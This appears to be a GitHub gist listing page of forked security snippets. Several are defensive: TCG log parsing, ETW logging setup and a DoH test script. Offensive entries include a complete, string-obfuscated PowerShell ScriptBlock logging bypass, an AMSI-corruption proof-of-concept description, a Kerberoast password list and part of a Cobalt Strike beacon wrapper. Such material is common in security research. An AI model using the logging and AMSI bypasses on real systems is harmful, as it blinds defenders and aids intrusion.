CaledoniaProject
@CaledoniaProject
CaledoniaProject / TI-Search-Shortcuts.md
Created March 25, 2019 14:06 — forked from Neo23x0/TI-Search-Shortcuts.md
Search Engine Shortcuts

Use Manage Search Engines in your browser to add these search engines. You can then use the 'keyword' in the URL bar to do a quick lookup. Find more details about managing your search engines in Chrome here.

e.g. Type

v dad8ebcbb5fa6721ccad45b81874e22c
@CaledoniaProject
CaledoniaProject / SimpleTCGLogParser.ps1
Created March 15, 2019 05:30 — forked from mattifestation/SimpleTCGLogParser.ps1
If you have the HgsDiagnostics PowerShell module, then you can parse TCG logs.
Import-Module HgsDiagnostics
# Locate the Microsoft.Windows.RemoteAttestation.Core assembly through the module's Get-HgsTrace command and load it
$GetHgsTrace = Get-Command Get-HgsTrace
$RemoteAttestationCoreReference = $GetHgsTrace.ImplementingType.Assembly.GetReferencedAssemblies() | Where-Object { $_.Name -eq 'Microsoft.Windows.RemoteAttestation.Core' }
Add-Type -AssemblyName $RemoteAttestationCoreReference.FullName
# Pick the most recently written measured-boot (TCG) log
$MostRecentTCGLog = Get-ChildItem C:\Windows\Logs\MeasuredBoot | Sort-Object -Property LastWriteTime -Descending | Select-Object -First 1 | Select-Object -ExpandProperty FullName
$LogBytes = [IO.File]::ReadAllBytes($MostRecentTCGLog)
# Parse the binary event log and group the measurement events by the PCR they extend
$ParsedTCGLog = [Microsoft.Windows.RemoteAttestation.Core.TcgEventLog]::Parse($LogBytes)
$ParsedTCGLog.TcgData.Children | Sort-Object -Property PcrIndex | Group-Object -Property PcrIndex
# These keyword values can be obtained with: logman query providers Microsoft-Windows-Kernel-Registry
[Flags()]
enum RegistryOptions {
CloseKey = 0x00000001
QuerySecurityKey = 0x00000002
SetSecurityKey = 0x00000004
EnumerateValueKey = 0x00000010
QueryMultipleValueKey = 0x00000020
SetInformationKey = 0x00000040
FlushKey = 0x00000080
# These values were obtained from: logman query providers Microsoft-Windows-Kernel-Process
$WINEVENT_KEYWORD_PROCESS = 0x10
$WINEVENT_KEYWORD_IMAGE = 0x40
# Normally when you enable an analytic log, all keywords are logged which can be veeeeerrrrryy noisy.
# I'm going to limit collection to only image and process event
$KernelProcessLog = New-Object -TypeName System.Diagnostics.Eventing.Reader.EventLogConfiguration -ArgumentList 'Microsoft-Windows-Kernel-Process/Analytic'
$KernelProcessLog.ProviderKeywords = ($WINEVENT_KEYWORD_PROCESS -bor $WINEVENT_KEYWORD_IMAGE)
$KernelProcessLog.ProviderLevel = 0xFF
$KernelProcessLog.IsEnabled = $true
function Get-ProcessStartKey {
<#
.SYNOPSIS
Derives the process start key for one or more processes.
.DESCRIPTION
Get-ProcessStartKey derives the process start key for one or more processes. Process start keys were introduced in Win 10 1507 and are intended to serve as a locally unique identifier for a process. A process ID cannot be considered a unique identifier since process IDs are repeatable.
@CaledoniaProject
CaledoniaProject / CorruptCLRGlobal.ps1
Created December 15, 2018 15:44 — forked from mattifestation/CorruptCLRGlobal.ps1
A PoC function to corrupt the g_amsiContext global variable in clr.dll in .NET Framework Early Access build 3694
function Subvert-CLRAntiMalware {
<#
.SYNOPSIS
A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694.
.DESCRIPTION
clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the first DWORD, the context structure will become corrupted and subsequent scanning calls will fail open.
@CaledoniaProject
CaledoniaProject / ScriptBlockLogBypass.ps1
Created November 26, 2018 03:10 — forked from cobbr/ScriptBlockLogBypass.ps1
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
@CaledoniaProject
CaledoniaProject / kerberoast_pws.xz
Last active November 14, 2018 05:11 — forked from edermi/kerberoast_pws.xz
edermi Kerberoast PW list (XZ format)
@CaledoniaProject
CaledoniaProject / doh_test.sh
Created November 10, 2018 15:38 — forked from dtmsecurity/doh_test.sh
DNS over HTTPS (DoH) Resolver GET Test Script
#!/bin/bash
# Queries three public DoH resolvers over the JSON (GET) API and prints the raw responses.
# Note: -k disables TLS certificate verification; it is kept here only for quick connectivity testing
# and should be dropped when the goal is to verify the resolver's identity.
printf "===START dns.google.com===\n"
curl -k -H "accept: application/dns-json" "https://dns.google.com/resolve?name=example.com&type=AAAA"
printf "\n===END dns.google.com===\n"
printf "===START cloudflare-dns.com===\n"
curl -k -H "accept: application/dns-json" "https://cloudflare-dns.com/dns-query?name=example.com&type=AAAA"
printf "\n===END cloudflare-dns.com===\n"
printf "===START 1.1.1.1===\n"
curl -k -H "accept: application/dns-json" "https://1.1.1.1/dns-query?name=example.com&type=AAAA"
printf "\n===END 1.1.1.1===\n"
@CaledoniaProject
CaledoniaProject / sharpgen.cna
Created November 9, 2018 00:29 — forked from dtmsecurity/sharpgen.cna
SharpGen Aggressor Beacon Wrapper
$dotnetpath = "/usr/local/share/dotnet/dotnet";
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";
$temppath = "/tmp/";
beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n");
alias sharpgen{
$executionId = "sharpgen_" . int(rand() * 100000);
$temporaryCsharp = $temppath . $executionId . ".cs";
$executableFilename = $temppath . $executionId . ".exe";